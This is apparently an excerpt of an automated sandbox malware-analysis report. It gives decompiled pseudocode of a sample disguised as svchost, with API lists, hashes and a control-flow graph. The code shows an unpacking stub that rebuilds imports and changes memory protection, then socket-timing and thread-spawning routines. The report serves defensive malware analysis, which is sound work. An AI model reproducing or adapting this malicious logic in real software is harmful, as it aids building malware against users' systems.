                                                                                                                                                                                                                                                                          						E04001260(_t40,  &_v524, 0, 0x200);
                                                                                                                                                                                                                                                                          						_v544 = E04001430(0x64);
                                                                                                                                                                                                                                                                          						_v540 = E04001430(7);
                                                                                                                                                                                                                                                                          						_t40 = E04001160(_v540,  *((intOrPtr*)(0x4088c00 + _v540 * 4)), 0x19, 1, 0x1388); // executed
                                                                                                                                                                                                                                                                          						_t73 = _t73 + 0x24;
                                                                                                                                                                                                                                                                          						_v536 = _t40;
                                                                                                                                                                                                                                                                          						if(_v536 == 0xffffffff) {
                                                                                                                                                                                                                                                                          							Sleep(1); // executed
                                                                                                                                                                                                                                                                          							_v532 = _v532 + 1;
                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							E040013B0( &_v524, _v544); // executed
                                                                                                                                                                                                                                                                          							 *0x400304c( &_v524, 0x4003134);
                                                                                                                                                                                                                                                                          							_v556 = GetTickCount();
                                                                                                                                                                                                                                                                          							E040010E0(_v536,  &_v524, _v544); // executed
                                                                                                                                                                                                                                                                          							_v548 = 0;
                                                                                                                                                                                                                                                                          							_v552 = 0;
                                                                                                                                                                                                                                                                          							E04001040(_v536,  &_v524, 0x200,  &_v548,  &_v552); // executed
                                                                                                                                                                                                                                                                          							_t73 = _t73 + 0x28;
                                                                                                                                                                                                                                                                          							_v8 = _v552 - _v556 + _v8;
                                                                                                                                                                                                                                                                          							_push(_v536); // executed
                                                                                                                                                                                                                                                                          							L04001000(); // executed
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t40 = _v528 + 1;
                                                                                                                                                                                                                                                                          					_v528 = _v528 + 1;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				asm("cdq");
                                                                                                                                                                                                                                                                          				return _v8 / 3;
                                                                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                                                                          0x04001499
                                                                                                                                                                                                                                                                          0x040014a0
                                                                                                                                                                                                                                                                          0x040014a7
                                                                                                                                                                                                                                                                          0x040014c2
                                                                                                                                                                                                                                                                          0x040014cf
                                                                                                                                                                                                                                                                          0x040014ea
                                                                                                                                                                                                                                                                          0x04001505
                                                                                                                                                                                                                                                                          0x04001517
                                                                                                                                                                                                                                                                          0x04001527
                                                                                                                                                                                                                                                                          0x04001544
                                                                                                                                                                                                                                                                          0x04001549
                                                                                                                                                                                                                                                                          0x0400154c
                                                                                                                                                                                                                                                                          0x04001559
                                                                                                                                                                                                                                                                          0x0400160f
                                                                                                                                                                                                                                                                          0x040014e4
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400155f
                                                                                                                                                                                                                                                                          0x0400156d
                                                                                                                                                                                                                                                                          0x04001581
                                                                                                                                                                                                                                                                          0x0400158d
                                                                                                                                                                                                                                                                          0x040015a8
                                                                                                                                                                                                                                                                          0x040015b0
                                                                                                                                                                                                                                                                          0x040015ba
                                                                                                                                                                                                                                                                          0x040015e5
                                                                                                                                                                                                                                                                          0x040015ea
                                                                                                                                                                                                                                                                          0x040015fc
                                                                                                                                                                                                                                                                          0x04001605
                                                                                                                                                                                                                                                                          0x04001606
                                                                                                                                                                                                                                                                          0x04001606
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001559
                                                                                                                                                                                                                                                                          0x040014b9
                                                                                                                                                                                                                                                                          0x040014bc
                                                                                                                                                                                                                                                                          0x040014bc
                                                                                                                                                                                                                                                                          0x04001622
                                                                                                                                                                                                                                                                          0x0400162d

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 04001430: QueryPerformanceCounter.KERNEL32(00000000), ref: 04001444
                                                                                                                                                                                                                                                                            • Part of subcall function 04001160: socket.WS2_32(00000002,00000001,00000006), ref: 0400116C
                                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000001), ref: 0400160F
                                                                                                                                                                                                                                                                            • Part of subcall function 040013B0: QueryPerformanceCounter.KERNEL32(?), ref: 040013E7
                                                                                                                                                                                                                                                                            • Part of subcall function 040013B0: Sleep.KERNELBASE(00000000), ref: 040013EF
                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,04003134), ref: 04001581
                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 04001587
                                                                                                                                                                                                                                                                          • closesocket.WS2_32(000000FF), ref: 04001606
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CounterPerformanceQuerySleep$CountTickclosesocketlstrcatsocket
                                                                                                                                                                                                                                                                          • String ID: F
                                                                                                                                                                                                                                                                          • API String ID: 900668384-1304234792
                                                                                                                                                                                                                                                                          • Opcode ID: e6bc4524acd37c5f2a61d60cd04ada7e2da9e6c79a86eb7b70bf2b9ee635fd7d
                                                                                                                                                                                                                                                                          • Instruction ID: d79780824819048788ded504410e9a552de5875a97c05552d19a965bcf11c014
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6bc4524acd37c5f2a61d60cd04ada7e2da9e6c79a86eb7b70bf2b9ee635fd7d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 053152B5D41218EBEB20EF94DC49BD973B4AB14308F0482D9E5197A2C1E7766F848F91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 160 408bf20-408bf2d 161 408bf3a-408bf3f 160->161 162 408bf41 161->162 163 408bf30-408bf35 162->163 164 408bf43 162->164 166 408bf36-408bf38 163->166 165 408bf48-408bf4a 164->165 167 408bf4c-408bf51 165->167 168 408bf53-408bf57 165->168 166->161 166->162 167->168 169 408bf59 168->169 170 408bf64-408bf67 168->170 171 408bf5b-408bf62 169->171 172 408bf83-408bf88 169->172 173 408bf69-408bf6e 170->173 174 408bf70-408bf72 170->174 171->170 171->172 175 408bf8a-408bf93 172->175 176 408bf9b-408bf9d 172->176 173->174 174->165 179 408c00a-408c00d 175->179 180 408bf95-408bf99 175->180 177 408bf9f-408bfa4 176->177 178 408bfa6 176->178 177->178 182 408bfa8-408bfab 178->182 183 408bf74-408bf76 178->183 181 408c012-408c015 179->181 180->178 184 408c017-408c019 181->184 185 408bfad-408bfb2 182->185 186 408bfb4 182->186 187 408bf78-408bf7d 183->187 188 408bf7f-408bf81 183->188 184->181 189 408c01b-408c01e 184->189 185->186 186->183 190 408bfb6-408bfb8 186->190 187->188 191 408bfd5-408bfe4 188->191 189->181 192 408c020-408c03c 189->192 193 408bfba-408bfbf 190->193 194 408bfc1-408bfc5 190->194 195 408bff4-408c001 191->195 196 408bfe6-408bfed 191->196 192->184 198 408c03e 192->198 193->194 194->190 199 408bfc7 194->199 195->195 197 408c003-408c005 195->197 196->196 200 408bfef 196->200 197->166 201 408c044-408c048 198->201 202 408bfc9-408bfd0 199->202 203 408bfd2 199->203 200->166 204 408c04a-408c060 LoadLibraryA 201->204 205 408c08f-408c092 201->205 202->190 202->203 203->191 207 408c061-408c066 204->207 206 408c095-408c09c 205->206 208 408c09e-408c0a0 206->208 209 408c0c0-408c0f0 VirtualProtect * 2 206->209 207->201 210 408c068-408c06a 207->210 211 408c0a2-408c0b1 208->211 212 408c0b3-408c0be 208->212 213 408c0f4-408c0f8 209->213 214 408c06c-408c072 210->214 215 408c073-408c080 GetProcAddress 210->215 211->206 212->211 213->213 216 408c0fa 213->216 214->215 217 408c089 ExitProcess 215->217 218 408c082-408c087 215->218 218->207
                                                                                                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                                                                                                          			_entry_() {
                                                                                                                                                                                                                                                                          				char _v128;
                                                                                                                                                                                                                                                                          				char _v280;
                                                                                                                                                                                                                                                                          				signed int _v408;
                                                                                                                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _v412;
                                                                                                                                                                                                                                                                          				signed int _v416;
                                                                                                                                                                                                                                                                          				signed int _v420;
                                                                                                                                                                                                                                                                          				void* _v424;
                                                                                                                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _v428;
                                                                                                                                                                                                                                                                          				signed int _v432;
                                                                                                                                                                                                                                                                          				void* _v436;
                                                                                                                                                                                                                                                                          				void* _v440;
                                                                                                                                                                                                                                                                          				void* _v444;
                                                                                                                                                                                                                                                                          				void _t72;
                                                                                                                                                                                                                                                                          				int _t73;
                                                                                                                                                                                                                                                                          				signed int _t74;
                                                                                                                                                                                                                                                                          				void _t75;
                                                                                                                                                                                                                                                                          				void _t76;
                                                                                                                                                                                                                                                                          				signed int _t78;
                                                                                                                                                                                                                                                                          				signed int _t79;
                                                                                                                                                                                                                                                                          				unsigned int _t80;
                                                                                                                                                                                                                                                                          				signed int _t90;
                                                                                                                                                                                                                                                                          				signed char* _t95;
                                                                                                                                                                                                                                                                          				long _t96;
                                                                                                                                                                                                                                                                          				char* _t99;
                                                                                                                                                                                                                                                                          				signed int _t100;
                                                                                                                                                                                                                                                                          				signed int _t101;
                                                                                                                                                                                                                                                                          				signed int _t103;
                                                                                                                                                                                                                                                                          				signed int _t106;
                                                                                                                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _t108;
                                                                                                                                                                                                                                                                          				void* _t111;
                                                                                                                                                                                                                                                                          				void* _t117;
                                                                                                                                                                                                                                                                          				signed int _t136;
                                                                                                                                                                                                                                                                          				signed int _t139;
                                                                                                                                                                                                                                                                          				signed int _t140;
                                                                                                                                                                                                                                                                          				signed int _t141;
                                                                                                                                                                                                                                                                          				intOrPtr* _t144;
                                                                                                                                                                                                                                                                          				signed int* _t146;
                                                                                                                                                                                                                                                                          				signed int _t147;
                                                                                                                                                                                                                                                                          				void* _t160;
                                                                                                                                                                                                                                                                          				signed int _t164;
                                                                                                                                                                                                                                                                          				void* _t170;
                                                                                                                                                                                                                                                                          				unsigned int* _t171;
                                                                                                                                                                                                                                                                          				CHAR* _t173;
                                                                                                                                                                                                                                                                          				signed int _t174;
                                                                                                                                                                                                                                                                          				signed int _t175;
                                                                                                                                                                                                                                                                          				signed int _t177;
                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t178;
                                                                                                                                                                                                                                                                          				intOrPtr _t179;
                                                                                                                                                                                                                                                                          				DWORD* _t180;
                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t181;
                                                                                                                                                                                                                                                                          				void* _t184;
                                                                                                                                                                                                                                                                          				signed int _t186;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				asm("pushad");
                                                                                                                                                                                                                                                                          				_t177 = 0x4063000;
                                                                                                                                                                                                                                                                          				_t1 = _t177 - 0x62000; // 0x4001000
                                                                                                                                                                                                                                                                          				_t170 = _t1;
                                                                                                                                                                                                                                                                          				_push(_t170);
                                                                                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                                                                                          					_t138 =  *_t177;
                                                                                                                                                                                                                                                                          					_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                                          					asm("adc ebx, ebx");
                                                                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                                                                          						if(_t184 < 0) {
                                                                                                                                                                                                                                                                          							_t72 =  *_t177;
                                                                                                                                                                                                                                                                          							_t177 = _t177 + 1;
                                                                                                                                                                                                                                                                          							 *_t170 = _t72;
                                                                                                                                                                                                                                                                          							_t170 = _t170 + 1;
                                                                                                                                                                                                                                                                          							__eflags = _t170;
                                                                                                                                                                                                                                                                          							goto L18;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_t73 = 1;
                                                                                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                                                                                          							_t139 = _t138 + _t138;
                                                                                                                                                                                                                                                                          							if(_t139 == 0) {
                                                                                                                                                                                                                                                                          								_t139 =  *_t177;
                                                                                                                                                                                                                                                                          								_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                                          								asm("adc ebx, ebx");
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							asm("adc eax, eax");
                                                                                                                                                                                                                                                                          							_t140 = _t139 + _t139;
                                                                                                                                                                                                                                                                          							_t186 = _t140;
                                                                                                                                                                                                                                                                          							if(_t186 >= 0) {
                                                                                                                                                                                                                                                                          								goto L27;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							L25:
                                                                                                                                                                                                                                                                          							if(_t186 != 0) {
                                                                                                                                                                                                                                                                          								L33:
                                                                                                                                                                                                                                                                          								_t147 = 0;
                                                                                                                                                                                                                                                                          								_t74 = _t73 - 3;
                                                                                                                                                                                                                                                                          								__eflags = _t74;
                                                                                                                                                                                                                                                                          								if(_t74 < 0) {
                                                                                                                                                                                                                                                                          									_t140 = _t140 + _t140;
                                                                                                                                                                                                                                                                          									__eflags = _t140;
                                                                                                                                                                                                                                                                          									if(__eflags == 0) {
                                                                                                                                                                                                                                                                          										_t140 =  *_t177;
                                                                                                                                                                                                                                                                          										_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                                          										asm("adc ebx, ebx");
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									L38:
                                                                                                                                                                                                                                                                          									if(__eflags < 0) {
                                                                                                                                                                                                                                                                          										L30:
                                                                                                                                                                                                                                                                          										_t138 = _t140 + _t140;
                                                                                                                                                                                                                                                                          										__eflags = _t138;
                                                                                                                                                                                                                                                                          										if(_t138 == 0) {
                                                                                                                                                                                                                                                                          											_t138 =  *_t177;
                                                                                                                                                                                                                                                                          											_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                                          											asm("adc ebx, ebx");
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										asm("adc ecx, ecx");
                                                                                                                                                                                                                                                                          										L48:
                                                                                                                                                                                                                                                                          										__eflags = _t178 - 0xfffffb00;
                                                                                                                                                                                                                                                                          										asm("adc ecx, 0x2");
                                                                                                                                                                                                                                                                          										_t160 = _t170 + _t178;
                                                                                                                                                                                                                                                                          										__eflags = _t178 - 0xfffffffc;
                                                                                                                                                                                                                                                                          										if(_t178 <= 0xfffffffc) {
                                                                                                                                                                                                                                                                          											do {
                                                                                                                                                                                                                                                                          												_t75 =  *_t160;
                                                                                                                                                                                                                                                                          												_t160 = _t160 + 4;
                                                                                                                                                                                                                                                                          												 *_t170 = _t75;
                                                                                                                                                                                                                                                                          												_t170 = _t170 + 4;
                                                                                                                                                                                                                                                                          												_t147 = _t147 - 4;
                                                                                                                                                                                                                                                                          												__eflags = _t147;
                                                                                                                                                                                                                                                                          											} while (_t147 > 0);
                                                                                                                                                                                                                                                                          											_t170 = _t170 + _t147;
                                                                                                                                                                                                                                                                          											break;
                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                          											goto L49;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										do {
                                                                                                                                                                                                                                                                          											L49:
                                                                                                                                                                                                                                                                          											_t76 =  *_t160;
                                                                                                                                                                                                                                                                          											_t160 = _t160 + 1;
                                                                                                                                                                                                                                                                          											 *_t170 = _t76;
                                                                                                                                                                                                                                                                          											_t170 = _t170 + 1;
                                                                                                                                                                                                                                                                          											_t147 = _t147 - 1;
                                                                                                                                                                                                                                                                          											__eflags = _t147;
                                                                                                                                                                                                                                                                          										} while (_t147 != 0);
                                                                                                                                                                                                                                                                          										break;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									_t147 = _t147 + 1;
                                                                                                                                                                                                                                                                          									_t140 = _t140 + _t140;
                                                                                                                                                                                                                                                                          									__eflags = _t140;
                                                                                                                                                                                                                                                                          									if(__eflags == 0) {
                                                                                                                                                                                                                                                                          										_t140 =  *_t177;
                                                                                                                                                                                                                                                                          										_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                                          										asm("adc ebx, ebx");
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									if(__eflags < 0) {
                                                                                                                                                                                                                                                                          										goto L30;
                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                          										goto L42;
                                                                                                                                                                                                                                                                          										do {
                                                                                                                                                                                                                                                                          											do {
                                                                                                                                                                                                                                                                          												L42:
                                                                                                                                                                                                                                                                          												_t141 = _t140 + _t140;
                                                                                                                                                                                                                                                                          												__eflags = _t141;
                                                                                                                                                                                                                                                                          												if(_t141 == 0) {
                                                                                                                                                                                                                                                                          													_t141 =  *_t177;
                                                                                                                                                                                                                                                                          													_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                                          													asm("adc ebx, ebx");
                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                          												asm("adc ecx, ecx");
                                                                                                                                                                                                                                                                          												_t140 = _t141 + _t141;
                                                                                                                                                                                                                                                                          												__eflags = _t140;
                                                                                                                                                                                                                                                                          											} while (__eflags >= 0);
                                                                                                                                                                                                                                                                          											if(__eflags != 0) {
                                                                                                                                                                                                                                                                          												break;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          											_t140 =  *_t177;
                                                                                                                                                                                                                                                                          											_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                                          											__eflags = _t177;
                                                                                                                                                                                                                                                                          											asm("adc ebx, ebx");
                                                                                                                                                                                                                                                                          										} while (_t177 >= 0);
                                                                                                                                                                                                                                                                          										_t147 = _t147 + 2;
                                                                                                                                                                                                                                                                          										__eflags = _t147;
                                                                                                                                                                                                                                                                          										goto L48;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_t78 =  *_t177;
                                                                                                                                                                                                                                                                          								_t177 = _t177 + 1;
                                                                                                                                                                                                                                                                          								_t79 = _t78 ^ 0xffffffff;
                                                                                                                                                                                                                                                                          								__eflags = _t79;
                                                                                                                                                                                                                                                                          								if(__eflags == 0) {
                                                                                                                                                                                                                                                                          									_pop(_t177);
                                                                                                                                                                                                                                                                          									_t171 = _t177;
                                                                                                                                                                                                                                                                          									goto L54;
                                                                                                                                                                                                                                                                          									do {
                                                                                                                                                                                                                                                                          										do {
                                                                                                                                                                                                                                                                          											L54:
                                                                                                                                                                                                                                                                          											_t80 =  *_t171;
                                                                                                                                                                                                                                                                          											_t171 =  &(_t171[0]);
                                                                                                                                                                                                                                                                          											__eflags = _t80 - 0xe8 - 1;
                                                                                                                                                                                                                                                                          										} while (_t80 - 0xe8 > 1);
                                                                                                                                                                                                                                                                          										__eflags =  *_t171;
                                                                                                                                                                                                                                                                          									} while ( *_t171 != 0);
                                                                                                                                                                                                                                                                          									asm("rol eax, 0x10");
                                                                                                                                                                                                                                                                          									 *_t171 = ( *_t171 >> 8) - _t171 + _t177;
                                                                                                                                                                                                                                                                          									__eflags =  &(_t171[1]);
                                                                                                                                                                                                                                                                          									asm("loop 0xffffffdb");
                                                                                                                                                                                                                                                                          									_t55 = _t177 + 0x89000; // 0x408a000
                                                                                                                                                                                                                                                                          									_t173 = _t55;
                                                                                                                                                                                                                                                                          									while(1) {
                                                                                                                                                                                                                                                                          										L57:
                                                                                                                                                                                                                                                                          										_t90 =  *_t173;
                                                                                                                                                                                                                                                                          										__eflags = _t90;
                                                                                                                                                                                                                                                                          										if(_t90 == 0) {
                                                                                                                                                                                                                                                                          											break;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										_t56 =  &(_t173[4]); // 0x2000
                                                                                                                                                                                                                                                                          										_t146 =  *_t56 + _t177;
                                                                                                                                                                                                                                                                          										_t175 =  &(_t173[8]);
                                                                                                                                                                                                                                                                          										__eflags = _t175;
                                                                                                                                                                                                                                                                          										_t178 = LoadLibraryA(_t90 + _t177 + 0x8c000);
                                                                                                                                                                                                                                                                          										while(1) {
                                                                                                                                                                                                                                                                          											_t173 = _t175 + 1;
                                                                                                                                                                                                                                                                          											__eflags =  *_t175;
                                                                                                                                                                                                                                                                          											if(__eflags == 0) {
                                                                                                                                                                                                                                                                          												goto L57;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          											if(__eflags < 0) {
                                                                                                                                                                                                                                                                          												_push( *_t173 & 0x0000ffff);
                                                                                                                                                                                                                                                                          												_t173 =  &(_t173[2]);
                                                                                                                                                                                                                                                                          												__eflags = _t173;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          											asm("repne scasb");
                                                                                                                                                                                                                                                                          											_t136 = GetProcAddress(_t178, _t173);
                                                                                                                                                                                                                                                                          											__eflags = _t136;
                                                                                                                                                                                                                                                                          											if(_t136 == 0) {
                                                                                                                                                                                                                                                                          												ExitProcess();
                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                          												 *_t146 = _t136;
                                                                                                                                                                                                                                                                          												_t146 =  &(_t146[1]);
                                                                                                                                                                                                                                                                          												continue;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									_t174 =  &(_t173[4]);
                                                                                                                                                                                                                                                                          									__eflags = _t174;
                                                                                                                                                                                                                                                                          									_t63 = _t177 - 4; // 0x4000ffc
                                                                                                                                                                                                                                                                          									_t144 = _t63;
                                                                                                                                                                                                                                                                          									while(1) {
                                                                                                                                                                                                                                                                          										_t174 = _t174 + 1;
                                                                                                                                                                                                                                                                          										_t93 = 0;
                                                                                                                                                                                                                                                                          										__eflags = 0;
                                                                                                                                                                                                                                                                          										if(0 == 0) {
                                                                                                                                                                                                                                                                          											break;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										__eflags = 0 - 0xef;
                                                                                                                                                                                                                                                                          										if(0 > 0xef) {
                                                                                                                                                                                                                                                                          											_t93 =  *_t174;
                                                                                                                                                                                                                                                                          											_t174 = _t174 + 2;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										_t144 = _t144 + _t93;
                                                                                                                                                                                                                                                                          										asm("rol eax, 0x10");
                                                                                                                                                                                                                                                                          										 *_t144 =  *_t144 + _t177;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									_t66 = _t177 + 0x8c05c; // 0x74656760
                                                                                                                                                                                                                                                                          									_t179 =  *_t66;
                                                                                                                                                                                                                                                                          									_t67 = _t177 - 0x1000; // 0x4000000
                                                                                                                                                                                                                                                                          									_t170 = _t67;
                                                                                                                                                                                                                                                                          									_t138 = 0x1000;
                                                                                                                                                                                                                                                                          									_push(0);
                                                                                                                                                                                                                                                                          									VirtualProtect(_t170, 0x1000, 4, _t180);
                                                                                                                                                                                                                                                                          									_t68 = _t170 + 0x1df; // 0x40001df
                                                                                                                                                                                                                                                                          									_t95 = _t68;
                                                                                                                                                                                                                                                                          									 *_t95 =  *_t95 & 0x0000007f;
                                                                                                                                                                                                                                                                          									_t69 =  &(_t95[0x28]);
                                                                                                                                                                                                                                                                          									 *_t69 = _t95[0x28] & 0x0000007f;
                                                                                                                                                                                                                                                                          									__eflags =  *_t69;
                                                                                                                                                                                                                                                                          									_pop(_t96);
                                                                                                                                                                                                                                                                          									_push(_t96);
                                                                                                                                                                                                                                                                          									VirtualProtect(_t170, 0x1000, _t96, _t180); // executed
                                                                                                                                                                                                                                                                          									asm("popad");
                                                                                                                                                                                                                                                                          									_t99 =  &_v128;
                                                                                                                                                                                                                                                                          									do {
                                                                                                                                                                                                                                                                          										_push(0);
                                                                                                                                                                                                                                                                          										__eflags = _t180 - _t99;
                                                                                                                                                                                                                                                                          									} while (_t180 != _t99);
                                                                                                                                                                                                                                                                          									_t181 = _t180 - 0xffffff80;
                                                                                                                                                                                                                                                                          									_push(_t179);
                                                                                                                                                                                                                                                                          									_t178 = _t181;
                                                                                                                                                                                                                                                                          									_t180 = _t181 - 0x1b8;
                                                                                                                                                                                                                                                                          									_t100 =  &_v280;
                                                                                                                                                                                                                                                                          									_push(_t100);
                                                                                                                                                                                                                                                                          									_push(0x202); // executed
                                                                                                                                                                                                                                                                          									L0400100C(); // executed
                                                                                                                                                                                                                                                                          									__eflags = _t100;
                                                                                                                                                                                                                                                                          									if(_t100 != 0) {
                                                                                                                                                                                                                                                                          										L16:
                                                                                                                                                                                                                                                                          										ExitProcess(0);
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									_v408 = 0;
                                                                                                                                                                                                                                                                          									_v412 = 0;
                                                                                                                                                                                                                                                                          									while(1) {
                                                                                                                                                                                                                                                                          										_t101 = E04001490(); // executed
                                                                                                                                                                                                                                                                          										_v416 = _t101;
                                                                                                                                                                                                                                                                          										__eflags = _v416;
                                                                                                                                                                                                                                                                          										if(_v416 <= 0) {
                                                                                                                                                                                                                                                                          											goto L14;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										__eflags = _v416 - 0x2710;
                                                                                                                                                                                                                                                                          										if(_v416 >= 0x2710) {
                                                                                                                                                                                                                                                                          											goto L14;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										 *0x4088c2c = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                          										_t103 = E040023E0( *((intOrPtr*)(0x4088c1c + _v408 * 4))); // executed
                                                                                                                                                                                                                                                                          										_t180 =  &(_t180[1]);
                                                                                                                                                                                                                                                                          										_v420 = _t103;
                                                                                                                                                                                                                                                                          										__eflags = _v420;
                                                                                                                                                                                                                                                                          										if(_v420 != 0) {
                                                                                                                                                                                                                                                                          											E04001DC0(_v420, 0x4085600); // executed
                                                                                                                                                                                                                                                                          											_t117 = E04001470(0xc);
                                                                                                                                                                                                                                                                          											_t180 =  &(_t180[3]);
                                                                                                                                                                                                                                                                          											_v440 = _t117;
                                                                                                                                                                                                                                                                          											_v424 = _v440;
                                                                                                                                                                                                                                                                          											 *_v424 =  *(0x4088c1c + _v408 * 4);
                                                                                                                                                                                                                                                                          											 *(_v424 + 4) = _v420;
                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v424 + 8)) = 0x4085600;
                                                                                                                                                                                                                                                                          											CreateThread(0, 0, E04001630, _v424, 0, 0); // executed
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										_v428 = 0;
                                                                                                                                                                                                                                                                          										while(1) {
                                                                                                                                                                                                                                                                          											__eflags = _v428 - 3;
                                                                                                                                                                                                                                                                          											if(_v428 >= 3) {
                                                                                                                                                                                                                                                                          												break;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          											_t106 = E040023E0( *((intOrPtr*)(0x4088c20 + (_v412 + _v428) * 4))); // executed
                                                                                                                                                                                                                                                                          											_t180 =  &(_t180[1]);
                                                                                                                                                                                                                                                                          											_v432 = _t106;
                                                                                                                                                                                                                                                                          											__eflags = _v432;
                                                                                                                                                                                                                                                                          											if(_v432 != 0) {
                                                                                                                                                                                                                                                                          												E04001DC0(_v432, 0x4085600); // executed
                                                                                                                                                                                                                                                                          												_t111 = E04001470(0xc);
                                                                                                                                                                                                                                                                          												_t180 =  &(_t180[3]);
                                                                                                                                                                                                                                                                          												_v444 = _t111;
                                                                                                                                                                                                                                                                          												_v436 = _v444;
                                                                                                                                                                                                                                                                          												_t164 = _v412 + _v428;
                                                                                                                                                                                                                                                                          												__eflags = _t164;
                                                                                                                                                                                                                                                                          												 *_v436 =  *(0x4088c20 + _t164 * 4);
                                                                                                                                                                                                                                                                          												 *(_v436 + 4) = _v432;
                                                                                                                                                                                                                                                                          												 *((intOrPtr*)(_v436 + 8)) = 0x4085600;
                                                                                                                                                                                                                                                                          												CreateThread(0, 0, E04001630, _v436, 0, 0); // executed
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          											_t108 =  &(_v428->nLength);
                                                                                                                                                                                                                                                                          											__eflags = _t108;
                                                                                                                                                                                                                                                                          											_v428 = _t108;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										WaitForSingleObject( *0x4088c2c, 0xffffffff);
                                                                                                                                                                                                                                                                          										Sleep(0x9c40);
                                                                                                                                                                                                                                                                          										L04001006();
                                                                                                                                                                                                                                                                          										goto L16;
                                                                                                                                                                                                                                                                          										L14:
                                                                                                                                                                                                                                                                          										Sleep(0x7530);
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_t178 = _t79 >> 1;
                                                                                                                                                                                                                                                                          								goto L38;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_t140 =  *_t177;
                                                                                                                                                                                                                                                                          							_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                                          							asm("adc ebx, ebx");
                                                                                                                                                                                                                                                                          							if(_t177 < 0) {
                                                                                                                                                                                                                                                                          								goto L33;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							L27:
                                                                                                                                                                                                                                                                          							_t73 = _t73 - 1;
